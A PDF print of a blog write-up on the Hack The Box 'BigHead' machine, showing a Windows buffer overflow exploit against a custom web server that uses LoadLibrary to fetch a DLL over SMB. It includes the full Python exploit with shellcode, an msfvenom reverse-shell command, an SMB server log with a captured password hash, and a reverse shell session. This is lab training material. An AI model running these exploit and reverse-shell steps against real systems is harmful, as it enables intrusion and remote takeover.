HTB BigHead Exploit - Small Buffer Exploit without Egghun... http://mislusnys.github.

io/post/htb-bighead/

HTB BigHead Exploit - Small Buffer Exploit

without Egghunter
(http://mislusnys.github.io/post/htb-
bighead/)
May 4, 2019
This post will demonstrate one of a few ways to deal with small bu!er space when exploiting bu!er
over"ows on Windows. This is not a full writeup of the BigHead machine and only demonstrates the
initial bu!er over"ow exploit using the LoadLibrary function.

Normally, when exploiting bu!er over"ows on Windows (no DEP) we just cram the shellcode into the
bu!er itself and #nd a way to jump to it. If the bu!er space is too small to #t the entire shellcode, then
a technique called “egg hunting” comes into play. Using this technique a very small 32-40 byte
shellcode is used. This code only searches the vulnerable program’s memory for the bigger shellcode
and jumps to it. It’s a technique that’s quite universal and works well in most situations.

However, in certain favorable circumstances we can exploit Windows programs in a way which is
similar to the Linux system('/bin/sh') one liner.

There are a couple of ways to achieve that:

1. WinExec(), system() and other similar functions

2. LoadLibrary()

In order to use any of these functions within a small bu!er space, they need to be already imported by
the vulnerable program.

In the case of BigHead Web Server, the LoadLibrary function is imported both by the executable itself
and bHeadSvr.dll .

So, in short, to achieve a one API call RCE with LoadLibrary we need to load a dll from a UNC path like
this:

LoadLibrary('\\attacker_ip\payload.dll')

The only requirement for this to work is that anonymous SMB outbound tra$c needs to be allowed.
Which is also true for the BigHead box.

Quick Summary
Let’s follow these steps to produce a working exploit using the LoadLibrary() technique:

Identify the web server running on the box

Analyze web server binary for vulnerabilities
Set up a test server behind nginx
Create a Proof of Concept exploit to crash the test server
Create an exploit to get a shell on the test server
Exploit the BigHead box

1 de 8 04/06/2020 17:29
HTB BigHead Exploit - Small Buffer Exploit without Egghun... http://mislusnys.github.io/post/htb-bighead/

Detailed Steps
Identify the web server running on the box
Using the standard enumeration techniques we identify a custom web server running on the
dev.bighead.htb VHOST on our target. Using some light OSINT we realize that the server binaries are
actually hosted on github: https://github.com/3mrgnc3/BigheadWebSvr (https://github.com/3mrgnc3
/BigheadWebSvr). We download the commit which has the exe #le inside and crack the zip password to
extract BigheadWebSvr.exe , bHeadSvr.dll and nginx.conf #les.

Analyze web server binaries for vulnerabilities

Reversing the web server executable we identify a potential vulnerabilty in the HTTP HEAD method
handling code. The server upon receiving the HEAD /payload request, hex decodes the payload part
and passes it to Function4() which in turn executes a strcpy() function and is therefore vulnerable to
stack based bu!er over"ow.

Set up a test server behind nginx

The vulnerable server on the BigHead box is actually only exposed via nginx reverse proxy. Therefore,
in order to properly exploit the server we need to set up a test environment similar to the one found
on the box. The requests that will reach our vulnerable server will be forwarded from nginx, so we
need to #rst understand how do they look like. We use the extracted nginx.conf #le to run nginx
reverse proxy on Kali and see how a sample request looks like coming from nginx and going towards
the BigHeadWebSvr binary.

We send a sample request:

root@kali:~/ctf/htb/bighead# nc 127.0.0.1 80
HEAD /test HTTP/1.1
Host: dev.bighead.htb

^C

On the other side it comes out:

2 de 8 04/06/2020 17:29
HTB BigHead Exploit - Small Buffer Exploit without Egghun... http://mislusnys.github.io/post/htb-bighead/

root@kali:~# nginx -c nginx.conf

root@kali:~# nc -lvp 8008
Ncat: Version 7.70 ( https://nmap.org/ncat )
Ncat: Listening on :::8008
Ncat: Listening on 0.0.0.0:8008
Ncat: Connection from 127.0.0.1.
Ncat: Connection from 127.0.0.1:48072.
HEAD /test HTTP/1.1
Host: 127.0.0.1:8008
Connection: close

Create a Proof of Concept exploit to crash the test server

We change the nginx.conf proxy_pass to point to our Windows VM running the BigHeadWebSvr.exe
server at http://172.16.14.62:8008; . And then create the following exploit skeleton to crash the
binary:

import socket

host = "127.0.0.1"
port = 80

buf = "a" * 100

head = "HEAD /" + buf + " HTTP/1.1\r\n"

head += "Host: dev.bighead.htb\r\n"
head += "Connection: close\r\n"
head += "\r\n"
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((host, port))
s.send(head)
print s.recv(1024)
s.close()

The server crashes:

3 de 8 04/06/2020 17:29
HTB BigHead Exploit - Small Buffer Exploit without Egghun... http://mislusnys.github.io/post/htb-bighead/

Then, we attach the debugger to inspect the crash closer:

We can see a couple of interesting pieces of information here:

1. The payload is hexli#ed, so the “AA” becomes 0xAA and not 0x41,0x41, this makes it a bit harder
to search for EIP o!set using mona.py
2. Our payload is cleanly referenced in the EAX register, so any JMP EAX, CALL EAX or similar
instruction will land us into our payload

After a few tries we #nd the correct o!set and the size of our bu!er (the size limitation is very
important for the steps that will follow):

buf = "aa" * 36 + "bbbbbbbb" + "cc" * 38

Now EIP is cleanly overwritten with 0xBBBBBBBB :

4 de 8 04/06/2020 17:29
HTB BigHead Exploit - Small Buffer Exploit without Egghun... http://mislusnys.github.io/post/htb-bighead/

Now using mona we #nd suitable instructions to jump to EAX address:

0BADF00D [+] Command used:

0BADF00D !mona jmp -r eax

<...snip...>

0BADF00D [+] Results :

00402AF3 0x00402af3 : jmp eax | startnull {PAGE_EXECUTE_READ} [BigheadWebSvr.exe] ASL
R: False, Rebase: False, SafeSEH: False, OS: False, v-1.0- (C:\tmp\BHWS_Backup\BigheadWeb
Svr.exe)
625012F2 0x625012f2 : jmp eax | {PAGE_EXECUTE_READ} [bHeadSvr.dll] ASLR: False, Reba
se: False, SafeSEH: False, OS: False, v-1.0- (C:\tmp\BHWS_Backup\bHeadSvr.dll)
64552F19 0x64552f19 : jmp eax | asciiprint,ascii {PAGE_EXECUTE_READ} [libmingwex-0.dl
l] ASLR: False, Rebase: False, SafeSEH: False, OS: False, v-1.0- (C:\tmp\BHWS_Backup\libm
ingwex-0.dll)
64552F44 0x64552f44 : jmp eax | asciiprint,ascii {PAGE_EXECUTE_READ} [libmingwex-0.dl
l] ASLR: False, Rebase: False, SafeSEH: False, OS: False, v-1.0- (C:\tmp\BHWS_Backup\libm
ingwex-0.dll)
64552F89 0x64552f89 : jmp eax | {PAGE_EXECUTE_READ} [libmingwex-0.dll] ASLR: False,
Rebase: False, SafeSEH: False, OS: False, v-1.0- (C:\tmp\BHWS_Backup\libmingwex-0.dll)
004010A1 0x004010a1 : call eax | startnull {PAGE_EXECUTE_READ} [BigheadWebSvr.exe] AS
LR: False, Rebase: False, SafeSEH: False, OS: False, v-1.0- (C:\tmp\BHWS_Backup\BigheadWe
bSvr.exe)

<...snip...>

0BADF00D [+] Done. Only the first 20 pointers are shown here. For more pointers, open j
mp.txt...
0BADF00D Found a total of 28 pointers
0BADF00D
0BADF00D [+] This mona.py action took 0:00:00.719000

We choose a dll address (which has no null bytes): 0x625012f2

Now when we replace the BBBBBBBB with f2125062 (little endian, hexli#ed) - we will overwrite EIP
with the address of jmp eax and this jump will redirect program execution to the start of our bu!er.

Create an exploit to get a shell on the test server

5 de 8 04/06/2020 17:29
HTB BigHead Exploit - Small Buffer Exploit without Egghun... http://mislusnys.github.io/post/htb-bighead/

Now in order to get a shell, all we need to do is execute LoadLibrary('\\IP\payload.dll') .

First we #nd the LoadLibrary() address in the bHeadSvr.dll :

The address is 0x62501B58 .

Next, we need to load the string \\IP\payload.dll or in our test case \\10.10.14.27\share\x.dll
into EAX and call the previously found address.

One thing that we notice is that whatever we put in our bu!er AFTER the EIP o!set is actually 0x0
terminated, which is perfect for us as it simpli#es getting the address of our string into the EAX. So,
when we start executing our shellcode the EAX points to the start of our bu!er and the UNC address
string is where the c's start in our POC:

buf = "aa" * 36 + "bbbbbbbb" + "cc" * 38 .

This means that the UNC string is at 36 + 4 = 40 (0x28 hex) bytes from the start of our bu!er. Since EAX
already holds the address of our bu!er, we only need to add 0x28 to it to have our string’s address in
there.

We create a small asm shellcode:

load_lib = ""
load_lib += "\x04\x28" # add al, 28h
load_lib += "\x50" # push eax ; EAX now points to the smb string
load_lib += "\xBB\x58\x1B\x50\x62" # mov ebx, 62501B58h ; Load EBX with the address
of LoadLibrary
load_lib += "\xFF\xD3" # call ebx ; Call LoadLibrary()

We use add al, 28h instead of add eax, 28h here to avoid null bytes and shorten the code as much
as possible.

So the #nal exploit becomes:

6 de 8 04/06/2020 17:29
HTB BigHead Exploit - Small Buffer Exploit without Egghun... http://mislusnys.github.io/post/htb-bighead/

#!/usr/bin/python
import socket
import binascii

host = "127.0.0.1"
port = 80

load_lib = ""
load_lib += "\x04\x28" # add al, 28h
load_lib += "\x50" # push eax ; EAX now points to the smb string
load_lib += "\xBB\x58\x1B\x50\x62" # mov ebx, 62501B58h ; Load EBX with the address
of LoadLibrary
load_lib += "\xFF\xD3" # call ebx

smb = "\\\\10.10.14.27\\share\\x.dll"

load_lib = binascii.hexlify(load_lib)
smb = binascii.hexlify(smb)

jmp_eax = 'F2125062'
align_esp = '505C' # push eax, pop esp
buf = align_esp + load_lib + "90" * 24 + jmp_eax + smb
head = "HEAD /" + buf + " HTTP/1.1\r\n"
head += "Host: dev.bighead.htb\r\n"
head += "Connection: close\r\n"
head += "\r\n"
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((host, port))
s.send(head)
s.recv(1024)
s.close()

Putting the breakpoint on JMP EAX instruction, running our exploit against the test server and jumping
into the bu!er we get:

Stepping through the instructions we see that everythings works perfectly!

Exploit the BigHead box

Now we change our target IP to the BigHead box (10.10.10.112), generate our dll payload and run our
exploit.

Generate the dll payload:

msfvenom -p windows/shell_reverse_tcp LHOST=10.10.14.27 LPORT=443 -f dll -o /tmp/x.dll

Serving this dll with impacket’s SMB server and running our exploit against the target:

7 de 8 04/06/2020 17:29
HTB BigHead Exploit - Small Buffer Exploit without Egghun... http://mislusnys.github.io/post/htb-bighead/

root@kali:~# python /usr/share/doc/python-impacket/examples/smbserver.py SHARE /tmp

Impacket v0.9.18 - Copyright 2018 SecureAuth Corporation

[*] Config file parsed

[*] Callback added for UUID 4B324FC8-1670-01D3-1278-5A47BF6EE188 V:3.0
[*] Callback added for UUID 6BFFD098-A112-3610-9833-46C3F87E345A V:1.0
[*] Config file parsed
[*] Config file parsed
[*] Config file parsed
[*] Incoming connection (127.0.0.1,54224)
[*] AUTHENTICATE_MESSAGE (PIEDPIPER\Nelson,PIEDPIPER)
[*] User Nelson\PIEDPIPER authenticated successfully
[*] Nelson::PIEDPIPER:4141414141414141:2af65562d1132c80bc7efe34d19995a1:01010000000000008
0bad4d617ead40194578ebe843541430000000001001000650055005700630050004f005a006a000200100055
0054004700630064004b004d00520003001000650055005700630050004f005a006a000400100055005400470
0630064004b004d0052000700080080bad4d617ead40106000400020000000800300030000000000000000000
000000200000161c779cadb5b7efab3d2f3e700187b0f5b695485a01b518fac14222bfb5db1a0000000000000
00000000000

And we receive a reverse shell:

$ sudo nc -lvp 443

[sudo] password for ms:
Listening on [0.0.0.0] (family 0, port 443)
Connection from bighead.htb 49160 received!
Microsoft Windows [Version 6.0.6002]
Copyright (c) 2006 Microsoft Corporation. All rights reserved.

C:\nginx>whoami & hostname

whoami & hostname
piedpiper\nelson
PiedPiper

C:\nginx>

Thanks for reading!

Copyright © 2019 - Powered by Hugo (https://gohugo.io) and Nix (https://github.com/LordMathis/hugo-

theme-nix/) theme.

8 de 8 04/06/2020 17:29